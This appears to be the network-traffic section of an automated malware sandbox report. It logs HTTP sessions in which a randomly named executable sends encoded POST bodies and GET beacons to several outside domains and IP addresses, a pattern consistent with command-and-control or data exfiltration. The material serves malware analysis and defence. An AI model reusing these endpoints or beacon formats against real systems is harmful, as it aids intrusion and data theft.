                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 67 67 53 66 54 2b 52 31 36 55 4c 72 72 64 2b 6e 74 4d 45 71 34 6d 78 43 56 70 30 38 58 65 76 49 6c 57 61 4e 38 67 6b 64 6e 39 4a 75 61 2b 38 42 32 7a 64 71 52 76 6a 73 58 53 37 75 6b 39 34 71 70 4d 4a 45 6a 66 76 32 55 74 71 37 69 31 6c 2b 4b 47 43 30 76 54 50 74 46 57 79 2f 56 6d 42 6f 6b 45 2f 70 55 7a 66 68 49 7a 6e 44 6c 35 72 43 6d 49 74 46 45 78 64 2f 4c 5a 51 66 36 47 59 4d 35 34 63 62 6e 41 72 70 59 66 7a 33 63 6b 77 33 79 47 6b 34 51 4a 34 38 6f 66 6a 74 2f 57 64 37 5a 36 34 32 67 47 48 79 39 4d 65 4a 59 76 2b 58 71 63 70 77 65 59 55 62 7a 48 39 71 78 47 33 33 30 48 33 73 52 37 71 70 73 63 50 76 33 6b 41 66 2f 68 42 6e 57 68 63 62 4c 49 66 35 44 58 47 38 67 70 59 39 68 4f 55 44 4e 76 75 2f 59 42 6a 66 5a 73 62 46 59 33 6b 38 44 34 50 51 65 46 53 49 4c 47 33 50 47 33 79 47 77 2f 68 53 64 48 68 62 58 46 54 65 65 52 77 59 6d 4f 45 49 6b 32 66 65 78 58 7a 76 4c 32 56 4e 56 42 65 61 59 63 65 45 6d 76 49 58 62 51 36 49 4c 6a 32 58 7a 68 52 79 4a 58 4f 6e 6b 48 66 72 34 49 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=ggSfT+R16ULrrd+ntMEq4mxCVp08XevIlWaN8gkdn9Jua+8B2zdqRvjsXS7uk94qpMJEjfv2Utq7i1l+KGC0vTPtFWy/VmBokE/pUzfhIznDl5rCmItFExd/LZQf6GYM54cbnArpYfz3ckw3yGk4QJ48ofjt/Wd7Z642gGHy9MeJYv+XqcpweYUbzH9qxG330H3sR7qpscPv3kAf/hBnWhcbLIf5DXG8gpY9hOUDNvu/YBjfZsbFY3k8D4PQeFSILG3PG3yGw/hSdHhbXFTeeRwYmOEIk2fexXzvL2VNVBeaYceEmvIXbQ6ILj2XzhRyJXOnkHfr4I08d9nSHVi1XX3BgZmNEZZJeUFtvxrk3EcZpavGhEjWg6Nc78A+7Pwp+F5AX2Z+aBMZuVzZwiwge+YH73uWOXvmVzdKeZFsEn54JojGNigpuJe4DcqBpLiDPqBlAoYNcpEz4dOMUoK9caIyAquZcQpPdvsAlNIeBKTCX9JcN1Z0gsrgQBEGJUP7T+kbyZITbjTXCeowntubXzV5cLmAomcQK1YLhkWw1dsI7C2OdANodL6hWXhSEjyhkuCZhIUGImIkIeczLCBYcSvVAYQz7336pOYWoC0CDIjkEi/S847KU0qEWn5hF/hRhkRAe2yXgWp4edPzFL6aFBU9k+N/ImtxgLTCZiomZjK3hRZuhZJQV6HEV2W23fEE//ghLvprGLmV+T+n6xWnB/zzOAsQNkx9tuvfvZ+gtFC6D3oGUqtnOka1RWa0pTqAV4AcHNJC8OLMBTxLQwgDWF64hIg3qYfQZDgxn/ssBeiczvoJry0CDKTZkeVYRZTuiUuYrtonbMJj25RdAVp26abgeZwUazSAiuQ6vfV/+F/nUyPDjxlMTDmmB0htVEWJxQR9DnhQDv3nDVIhdK6N+hvEH/sDsu16O7uiniloyBIX1Te8CxtkhLU0DcLSWYNH9SbxD/89n1AN2yKp5Zei2XR2X0qEfQYTrN0FD3T6zK1a [TRUNCATED]
                                                                            Dec 10, 2024 16:25:07.347980976 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.5499683.33.130.190801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:09.065984964 CET536OUTGET /gnm5/?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.binacamasala.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:19.188924074 CET392INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Tue, 10 Dec 2024 15:25:18 GMT
                                                                            content-length: 271
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 54 4a 30 62 68 43 3d 74 69 36 2f 51 4f 67 74 33 46 33 4e 6c 38 43 38 70 35 70 72 74 6a 4d 61 57 36 59 36 49 4d 57 39 6c 6e 57 44 35 69 52 6d 69 66 31 6f 4c 75 6c 48 67 51 68 6a 59 39 69 57 65 56 62 76 75 61 49 72 6d 38 64 4c 31 4e 61 6a 41 4f 75 76 68 6b 35 50 52 52 48 57 67 33 43 62 56 6e 53 38 56 78 70 44 72 78 6a 75 51 51 4c 5a 43 45 57 41 6c 4a 72 45 7a 4a 31 73 64 56 6b 4e 41 36 4d 32 39 43 78 70 6b 41 3d 3d 26 50 74 3d 66 44 6c 48 6f 4e 57 50 30 52 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.54999546.38.243.234801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:24.796169043 CET776OUTPOST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 50 62 50 37 4e 4d 46 4d 49 66 4d 79 6e 35 7a 35 6e 38 69 4e 48 50 2f 45 79 75 34 6d 69 55 4b 79 71 30 50 70 67 75 67 4a 63 66 34 78 74 52 35 56 39 58 2b 76 6b 63 77 36 63 6b 72 67 48 30 64 68 69 78 32 52 41 68 56 31 6c 37 2f 42 4a 4d 64 62 61 64 4c 56 6f 39 2b 72 6f 4e 62 66 6e 6b 38 78 73 50 57 72 78 41 73 41 58 71 64 4c 74 6d 75 65 73 55 56 66 7a 64 6d 70 38 59 4a 55 66 4a 34 6a 4d 57 58 64 76 43 64 64 54 4b 44 6e 37 6e 63 76 72 4f 67 64 33 51 70 78 47 48 50 4b 41 49 4e 37 72 34 54 61 77 51 50 5a 6e 57 49 6f 42 4d 46 4f 36 43 78 44 75 7a 30 69 44 69 34 31 4d 44 54 75 4e 4b 30 4c 48 30 38 3d
                                                                            Data Ascii: UTJ0bhC=PbP7NMFMIfMyn5z5n8iNHP/Eyu4miUKyq0PpgugJcf4xtR5V9X+vkcw6ckrgH0dhix2RAhV1l7/BJMdbadLVo9+roNbfnk8xsPWrxAsAXqdLtmuesUVfzdmp8YJUfJ4jMWXdvCddTKDn7ncvrOgd3QpxGHPKAIN7r4TawQPZnWIoBMFO6CxDuz0iDi41MDTuNK0LH08=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.54999646.38.243.234801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:27.455949068 CET796OUTPOST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 50 62 50 37 4e 4d 46 4d 49 66 4d 79 6d 61 37 35 6c 64 69 4e 41 76 2f 46 72 4f 34 6d 33 45 4c 37 71 30 54 70 67 72 41 6a 66 70 6f 78 73 7a 52 56 38 57 2b 76 68 63 77 36 58 45 72 68 61 6b 64 36 69 78 71 76 41 6b 31 31 6c 36 62 42 4a 4d 4e 62 64 75 54 53 75 74 2b 70 6a 74 62 64 70 45 38 78 73 50 57 72 78 45 45 35 58 71 56 4c 73 57 65 65 73 31 56 41 6f 39 6d 75 30 34 4a 55 4f 5a 34 6e 4d 57 58 2f 76 44 42 6a 54 50 50 6e 37 6d 73 76 72 61 4d 65 38 51 70 33 4a 6e 4f 47 45 70 56 2b 79 70 6a 79 35 7a 71 64 36 55 49 67 45 36 30 6b 67 67 35 72 39 54 59 61 54 78 77 43 64 7a 79 48 58 70 6b 37 5a 6a 71 6d 52 54 6f 48 50 67 2b 76 32 73 70 68 54 68 74 64 6b 6a 44 4f
                                                                            Data Ascii: UTJ0bhC=PbP7NMFMIfMyma75ldiNAv/FrO4m3EL7q0TpgrAjfpoxszRV8W+vhcw6XErhakd6ixqvAk11l6bBJMNbduTSut+pjtbdpE8xsPWrxEE5XqVLsWees1VAo9mu04JUOZ4nMWX/vDBjTPPn7msvraMe8Qp3JnOGEpV+ypjy5zqd6UIgE60kgg5r9TYaTxwCdzyHXpk7ZjqmRToHPg+v2sphThtdkjDO


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.54999746.38.243.234801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:30.110182047 CET1813OUTPOST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 50 62 50 37 4e 4d 46 4d 49 66 4d 79 6d 61 37 35 6c 64 69 4e 41 76 2f 46 72 4f 34 6d 33 45 4c 37 71 30 54 70 67 72 41 6a 66 70 67 78 74 43 78 56 38 31 6d 76 69 63 77 36 61 6b 72 6b 61 6b 63 34 69 78 69 7a 41 6b 70 50 6c 34 54 42 50 75 31 62 59 66 54 53 6e 74 2b 70 73 4e 62 65 6e 6b 38 6b 73 4c 4b 6e 78 41 59 35 58 71 56 4c 73 55 57 65 71 6b 56 41 71 39 6d 70 38 59 4a 41 66 4a 34 66 4d 57 2f 46 76 44 46 7a 51 38 48 6e 37 47 38 76 6e 50 67 65 78 51 70 31 4f 6e 50 62 45 70 6f 75 79 70 2f 59 35 79 65 6e 36 57 49 67 47 38 46 2f 77 6a 68 67 35 56 34 58 52 41 6f 66 44 57 69 39 5a 4c 67 42 59 51 2b 72 64 33 38 30 41 6b 57 7a 33 4e 63 75 45 6c 6c 62 31 55 72 4f 79 6e 33 4c 42 49 73 75 58 30 73 5a 4b 32 44 43 39 49 4e 45 44 76 36 55 72 44 2b 79 33 69 69 59 62 4a 67 35 42 45 74 63 48 49 6c 4d 6f 4e 51 73 73 50 76 72 4c 6f 33 42 41 56 71 2f 57 71 4a 31 74 6f 38 71 61 46 45 6e 75 38 43 43 36 47 53 70 39 74 75 4e 6d 37 6e 2f 7a 53 61 6e 76 6d 50 48 37 78 78 63 78 42 31 34 36 65 44 7a 59 65 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=PbP7NMFMIfMyma75ldiNAv/FrO4m3EL7q0TpgrAjfpgxtCxV81mvicw6akrkakc4ixizAkpPl4TBPu1bYfTSnt+psNbenk8ksLKnxAY5XqVLsUWeqkVAq9mp8YJAfJ4fMW/FvDFzQ8Hn7G8vnPgexQp1OnPbEpouyp/Y5yen6WIgG8F/wjhg5V4XRAofDWi9ZLgBYQ+rd380AkWz3NcuEllb1UrOyn3LBIsuX0sZK2DC9INEDv6UrD+y3iiYbJg5BEtcHIlMoNQssPvrLo3BAVq/WqJ1to8qaFEnu8CC6GSp9tuNm7n/zSanvmPH7xxcxB146eDzYeKoD3Ilxq6RAZBncfovKvyXze/L8AKBKMh4Ji+82Swsibtal3392ZunWAY0QsUggNhDgLVW+4Xbss8k0cqud2ApFJK63yH62jurVMBm4/V2ZPCwEN7EFXkbR22CC6g1QHQskFoDTbP/pjCJVvqc6jpYl+XAko2IyE9my7qpZJ9ZW2luIt0+Eu8IymwCklzGc6wiX/aR4SSXcAPUyT/f3rAVIVWO2zt72kwNTbN7cm6doIpZBhY4LZT5au7D915H5Qbw+VSC2X9Xe91KNDhBHPDBL+6E4VqiT45NdruIBaFJ3plhEZ0Iu57GAz3gjsu9SLUtS4/cO5oBzA2yxSGaqdNlEZL1iaEUasKy5Ai2jA39ApoFI7ztTYyCv/leThtss+KE78q384KBW4XMwnD5lPO6Goysr9LDHSnApWNEieNryOCS0lbh8TS2OlN+HMRKMLidJkqSwbYmTd1eD0sZLj73+/Fb8JE3AMh7Lc8QIduZcuniaoLT7oE51tBOndlYguDByzLBhUDQfekDL+0A7hSghCeyz17IWKhkCxxyG/339vdUmeYHtwtvvmDEgXCiKTKmXky4g2sQ9kWl9lDtIhMCNyZcbN1uNWDkVCACby+Em8Ew3pucYRyfbmnBNbMB01FD0OglP11RVBlnMMdDVnayloJuScnOff0Z [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.54999846.38.243.234801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:32.770186901 CET529OUTGET /zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.dlion.net
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:40.784006119 CET455INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:23:20 GMT
                                                                            Server: Apache/2.4.10 (Debian)
                                                                            Content-Length: 275
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6c 69 6f 6e 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.dlion.net Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.54999974.48.34.43801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:47.059088945 CET782OUTPOST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 49 70 67 50 43 63 61 4f 4d 75 6a 46 34 43 5a 72 65 42 74 55 2b 41 49 51 6d 47 78 6b 44 49 52 6a 32 77 71 4d 34 48 70 6f 6c 77 59 64 72 4b 4c 42 4e 44 51 4a 5a 48 41 33 41 65 79 39 62 6d 54 68 43 75 30 44 51 7a 6f 6b 53 6a 70 61 4c 79 45 6c 74 78 5a 7a 37 4b 62 6b 79 4f 74 61 66 31 51 2f 43 51 45 6f 6a 35 66 6f 78 7a 65 79 38 44 6f 72 31 34 41 72 45 30 6a 57 4d 54 72 6f 4d 38 4f 6c 42 77 70 45 79 58 6b 55 47 56 67 42 70 52 6c 55 6a 69 2f 47 6b 61 4d 6a 39 31 48 76 31 77 74 5a 34 63 42 2b 78 4c 38 33 51 36 57 4b 41 4b 35 62 37 52 72 7a 4c 56 54 33 6e 4a 5a 6d 2b 34 67 36 37 55 30 37 71 65 63 3d
                                                                            Data Ascii: UTJ0bhC=IpgPCcaOMujF4CZreBtU+AIQmGxkDIRj2wqM4HpolwYdrKLBNDQJZHA3Aey9bmThCu0DQzokSjpaLyEltxZz7KbkyOtaf1Q/CQEoj5foxzey8Dor14ArE0jWMTroM8OlBwpEyXkUGVgBpRlUji/GkaMj91Hv1wtZ4cB+xL83Q6WKAK5b7RrzLVT3nJZm+4g67U07qec=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.55000074.48.34.43801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:49.721002102 CET802OUTPOST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 49 70 67 50 43 63 61 4f 4d 75 6a 46 34 68 78 72 66 6a 46 55 70 77 49 54 73 6d 78 6b 61 59 52 76 32 77 6d 4d 34 47 73 31 6b 43 73 64 73 72 37 42 66 53 51 4a 59 48 41 33 59 4f 79 34 56 47 54 6d 43 75 34 68 51 79 55 6b 53 6e 42 61 4c 79 30 6c 71 47 74 77 30 36 62 69 72 65 74 59 62 31 51 2f 43 51 45 6f 6a 35 61 4e 78 7a 32 79 38 7a 59 72 31 64 30 71 61 45 6a 56 4c 54 72 6f 64 4d 4f 35 42 77 70 6d 79 56 52 78 47 51 6b 42 70 54 39 55 6d 6a 2f 46 78 4b 4d 70 69 46 48 34 6a 78 31 58 2b 2f 34 30 73 34 6f 30 4e 61 47 45 42 38 49 78 68 7a 6a 62 59 31 2f 50 33 61 52 52 76 49 42 54 68 33 6b 4c 30 4a 49 34 41 4e 66 36 4a 49 62 74 33 31 7a 51 73 59 48 6c 62 45 4e 52
                                                                            Data Ascii: UTJ0bhC=IpgPCcaOMujF4hxrfjFUpwITsmxkaYRv2wmM4Gs1kCsdsr7BfSQJYHA3YOy4VGTmCu4hQyUkSnBaLy0lqGtw06biretYb1Q/CQEoj5aNxz2y8zYr1d0qaEjVLTrodMO5BwpmyVRxGQkBpT9Umj/FxKMpiFH4jx1X+/40s4o0NaGEB8IxhzjbY1/P3aRRvIBTh3kL0JI4ANf6JIbt31zQsYHlbENR
                                                                            Dec 10, 2024 16:25:51.230290890 CET796INHTTP/1.1 404 Not Found
                                                                            Server: openresty/1.19.3.1
                                                                            Date: Tue, 10 Dec 2024 15:25:51 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Cache: MISS from kangle web server
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 32 32 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ad 53 4d 8f d3 30 10 3d d3 5f 61 22 81 bb 5a 25 ee f6 63 59 5a c7 1c 90 e0 82 56 08 76 cf c8 8d a7 89 d9 34 0e 13 37 4b ff 3d 33 89 4a 11 f4 48 0e 71 e2 bc bc 37 ef cd 58 57 71 5f 9b 89 ae c0 3a 33 79 a1 f7 10 ad a8 62 6c 53 f8 71 f0 7d 9e bc 0f 4d 84 26 a6 0f c7 16 12 51 8c 6f 79 12 e1 67 54 fc ef 46 14 95 c5 0e 62 fe f8 f0 21 bd 4b 98 24 fa 58 83 59 ce 96 5a 8d 8f 13 ad 46 01 bd 0d ee 48 72 ce f7 c2 bb 5c ee ad 6f a4 b8 74 11 c8 1b 5d cd cd d7 40 35 55 be 29 05 20 06 5c 13 d5 dc 68 e5 09 d0 12 60 31 ea d0 ca cf 7a 47 05 52 95 75 c0 5c 22 38 69 ee 83 e8 0e 45 25 76 be 06 11 50 38 8f 50 c4 80 c7 4c 2b 06 13 15 ff a7 da 81 ef 73 0d b6 03 b2 04 c5 13 a3 35 85 81 b0 cb e5 77 db db ae 40 df c6 75 1d 0a 1b 7d 68 32 84 3a 58 37 bd 92 26 e2 51 d8 92 bc 68 65 8d a8 6d 04 24 7a a6 24 a3 a6 0a 5d 6c ec 1e d6 e2 c9 36 25 95 f1 0c 5b d1 01 f6 80 5a 31 40 57 38 42 87 4c da ad 34 1f a1 01 24 1a 27 b6 c7 8b 45 9c 23 eb 2d 92 61 07 39 e5 fd 57 94 66 d4 53 8b 6c 95 cd 6f [TRUNCATED]
                                                                            Data Ascii: 220SM0=_a"Z%cYZVv47K=3JHq7XWq_:3yblSq}M&QoygTFb!K$XYZFHr\ot]@5U) \h`1zGRu\"8iE%vP8PL+s5w@u}h2:X7&Qhem$z$]l6%[Z1@W8BL4$'E#-a9WfSlo[./feEU7WId~P0u8i,(B6#O'+ Ct;Gn&lO5T=UGcRGy-{gn0g(E)}.UBSZ0dq~h<45e{$}ph<c=;0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.55000174.48.34.43801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:52.373214006 CET1819OUTPOST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 49 70 67 50 43 63 61 4f 4d 75 6a 46 34 68 78 72 66 6a 46 55 70 77 49 54 73 6d 78 6b 61 59 52 76 32 77 6d 4d 34 47 73 31 6b 43 55 64 72 64 48 42 4e 68 34 4a 4b 58 41 33 51 75 79 35 56 47 53 6a 43 74 49 6c 51 79 59 53 53 68 46 61 4b 51 38 6c 76 79 78 77 76 71 62 69 6a 2b 74 5a 66 31 51 6d 43 51 55 73 6a 36 79 4e 78 7a 32 79 38 78 41 72 69 59 41 71 59 45 6a 57 4d 54 72 30 4d 38 4f 64 42 77 67 5a 79 57 38 45 47 6a 73 42 70 7a 74 55 68 46 6a 46 73 36 4d 76 6a 46 47 39 6a 78 49 56 2b 2f 31 4e 73 37 31 66 4e 59 6d 45 4e 36 42 49 78 48 7a 43 43 44 76 62 39 36 46 63 79 34 52 43 6f 48 6f 6c 34 4c 6b 6f 4b 2b 65 59 47 59 71 76 31 56 7a 61 30 38 6a 72 52 42 55 64 66 51 77 30 67 4d 56 2f 77 49 62 50 4e 41 44 30 75 68 66 64 49 7a 77 35 53 2b 77 70 35 46 53 33 6b 42 4b 44 77 6a 6d 71 51 6b 69 61 35 65 54 36 58 4e 37 47 5a 4a 35 4c 55 58 30 73 4a 69 4e 56 76 46 46 42 71 35 65 6f 4d 64 73 31 38 4b 32 35 53 34 53 4a 74 4b 34 66 6a 30 77 72 47 43 54 4a 4d 73 37 53 41 52 77 5a 69 46 57 77 64 44 [TRUNCATED]
